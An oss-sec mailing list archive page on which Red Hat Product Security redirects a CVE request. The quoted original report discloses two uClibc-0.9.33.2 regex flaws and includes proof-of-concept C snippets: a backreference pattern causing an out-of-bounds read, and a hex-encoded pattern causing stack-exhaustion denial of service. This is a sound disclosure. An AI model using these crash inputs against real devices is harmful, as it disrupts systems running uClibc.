oss-sec mailing list archives
Re: two vulns in uClibc-0.9.33.2
From: Andrej Nemec <anemec () redhat com>
Date: Fri, 16 Jun 2017 08:15:59 +0200
Hello, Unfortunately, CVE assignments are not done through this list anymore. You need to visit [1] and request the CVEs by filing out the form. Could you please look at it and let the list know about the assigned CVEs? Thanks! [1] https://cveform.mitre.org/ Best Regards, -- Andrej Nemec, Red Hat Product Security 3701 3214 E472 A9C3 EFBE 8A63 8904 44A1 D57B 6DDA On 06/16/2017 05:53 AM, fefe wrote:
I found two vulns in uClibc-0.9.33.2 (https://uclibc.org/) one is about line 2682 of get_subexp.c : if (BE (bkref_str_off >= mctx->input.valid_len, 0)) { /* If we are at the end of the input, we cannot match. */ if (bkref_str_off >= mctx->input.len) break; err = extend_buffers (mctx); if (BE (err != REG1_NOERROR, 0)) return err; buf = (const char *) re_string_get_buffer (&mctx->input); } if (buf [bkref_str_off++] != buf[sl_str - 1]) break; /* We don't need to search this sub expression "bkref_str_off >= mctx->input.valid_len" , when bkref_str_off == mctx->input.valid_len, "buf [bkref_str_off++] != buf[sl_str - 1]" case Out of one bit bounds read The poc code like: if(regcomp (®tmp,"(.+)upper\\1^", REG_EXTENDED|REG_ICASE | REG_NOSUB )==0) { reg1match_t pmatch[1]; regexec(®tmp, "upperupperupperx",1, pmatch, 0); regfree(®tmp); } The another is aout line 1837 of regexce.c : check_dst_limits_calc_pos_1 (const re_match_context_t *mctx, int boundaries, int subexp_idx, int from_node, int bkref_idx) ....... cpos = check_dst_limits_calc_pos_1 (mctx, boundaries, subexp_idx, dst, bkref_idx); check_dst_limits_calc_pos_1 recursive calls case DDOS, because of stack exhaustion. The poc code like: if(regcomp (®tmp,"\x28\x2E\x3F\x3F\x28\x2E\x3F\x29\x5C\x42\x44\x3F\x3F\x28\x2E\x5C\x32\x29\x2A\x5C\x32\x28\x2E\x3F\x29\x5C\x32\x29\x2A\x5C\x32\xBD", REG_EXTENDED|REG_ICASE | REG_NOSUB )==0) { reg1match_t pmatch[1]; regexec(®tmp, "\x72\xFF\xFF\xFF\xFF\xBD",1, pmatch, 0); regfree(®tmp); } A large number of embedded devices uses uclibc instead of glibc. Could you assign CVE id for those? Thank you Benjin Liu Codesafe Team of Qihoo 360
Attachment:
signature.asc
Description: OpenPGP digital signature
Current thread:
- two vulns in uClibc-0.9.33.2 fefe (Jun 15)
- Re: two vulns in uClibc-0.9.33.2 Andrej Nemec (Jun 15)
- Re: two vulns in uClibc-0.9.33.2 Zach W (Jun 16)
- Re: two vulns in uClibc-0.9.33.2 Peter Korsgaard (Jun 16)
- Re: two vulns in uClibc-0.9.33.2 Seth Arnold (Jun 16)
- Re: two vulns in uClibc-0.9.33.2 Kurt Seifried (Jun 16)
- Re: two vulns in uClibc-0.9.33.2 Michal Zalewski (Jun 16)
- Re: two vulns in uClibc-0.9.33.2 Bob Friesenhahn (Jun 16)
- Re: two vulns in uClibc-0.9.33.2 Florian Weimer (Jun 17)
- Re: two vulns in uClibc-0.9.33.2 Michal Zalewski (Jun 17)
- Re: two vulns in uClibc-0.9.33.2 Simon McVittie (Jun 17)
- Re: two vulns in uClibc-0.9.33.2 Jakub Wilk (Jun 17)